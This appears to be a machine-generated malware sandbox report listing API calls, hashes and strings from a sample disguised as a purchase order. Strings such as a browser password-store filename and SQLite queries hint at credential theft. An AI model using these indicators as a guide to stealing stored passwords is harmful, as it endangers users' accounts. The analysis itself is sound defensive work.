                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                      • String ID: </%s>
                                                                                                      • API String ID: 3400436232-259020660
                                                                                                      • Opcode ID: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                      • Opcode Fuzzy Hash: 5b9d86c37e8fc893e623c972aadbd746c4d139f4edb44e4e662c1ed71a902018
                                                                                                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040E770
                                                                                                      • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendmemset
                                                                                                      • String ID: AE$"
                                                                                                      • API String ID: 568519121-1989281832
                                                                                                      • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                      • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
APIs
• memset.MSVCRT ref: 0040D58D
• SetWindowTextW.USER32(?,?), ref: 0040D5BD
• EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
Strings
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: ChildEnumTextWindowWindowsmemset
• String ID: caption
APIs
  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
• CreateFontIndirectW.GDI32(?), ref: 00401156
• SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
• SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
Strings
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
• String ID: MS Sans Serif
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: ClassName_wcsicmpmemset
• String ID: edit
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
• FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
Strings
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
• String ID: SHAutoComplete$shlwapi.dll
APIs
• memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
• memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
• memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
• memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
• memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: memcpy$memcmp
• String ID:
APIs
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: memset$memcpy
• String ID:
APIs
  • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
  • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
  • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
  • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
• GetMenu.USER32(?), ref: 00410F8D
• GetSubMenu.USER32(00000000), ref: 00410F9A
• GetSubMenu.USER32(00000000), ref: 00410F9D
• CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Menu$ItemMessageSend$CheckEnableRadio
• String ID:
APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
• GetLastError.KERNEL32 ref: 0041810A
• CloseHandle.KERNEL32(00000000), ref: 00418120
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastMappingView
• String ID:
APIs
  • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
• memcpy.MSVCRT(?,?,?), ref: 0042EC7A
Strings
• virtual tables may not be altered, xrefs: 0042EBD2
• Cannot add a column to a view, xrefs: 0042EBE8
• sqlite_altertab_%s, xrefs: 0042EC4C
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: memcpymemset
• String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
APIs
• memset.MSVCRT ref: 0040560C
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
Strings
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                      • String ID: *.*$dat$wand.dat
                                                                                                      • API String ID: 2618321458-1828844352
                                                                                                      • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                      • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                      • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                      • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                      • wcslen.MSVCRT ref: 00410C74
                                                                                                      • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                      • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                      • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1549203181-0
                                                                                                      • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                      • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                      • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                      • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00412057
                                                                                                        • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                      • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                      • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                      • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 3550944819-0
                                                                                                      • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                      • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                      • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                      • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                      APIs
                                                                                                      • free.MSVCRT ref: 0040F561
                                                                                                      • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$free
                                                                                                      • String ID: g4@
                                                                                                      • API String ID: 2888793982-2133833424
                                                                                                      • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                      • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                      • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                      • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                      • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                      • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: @
                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                      • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                      • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                      • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                      • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                      • memset.MSVCRT ref: 0040AF18
                                                                                                      • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1865533344-0
                                                                                                      • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                      • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                      • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                      • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004144E7
                                                                                                        • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                        • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                      • memset.MSVCRT ref: 0041451A
                                                                                                      • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 1127616056-0
                                                                                                      • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                      • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                      • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                      • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                      • memset.MSVCRT ref: 0042FED3
                                                                                                      • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: sqlite_master
                                                                                                      • API String ID: 438689982-3163232059
                                                                                                      • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                      • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                      • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                      • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                      APIs
                                                                                                      • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                      • wcscpy.MSVCRT ref: 00414DF3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3917621476-0
                                                                                                      • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                      • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                      • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                      • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                      • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                      • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                      • _snwprintf.MSVCRT ref: 0041100C
                                                                                                      • wcscat.MSVCRT ref: 0041101F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 822687973-0
                                                                                                      • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                      • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                      • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
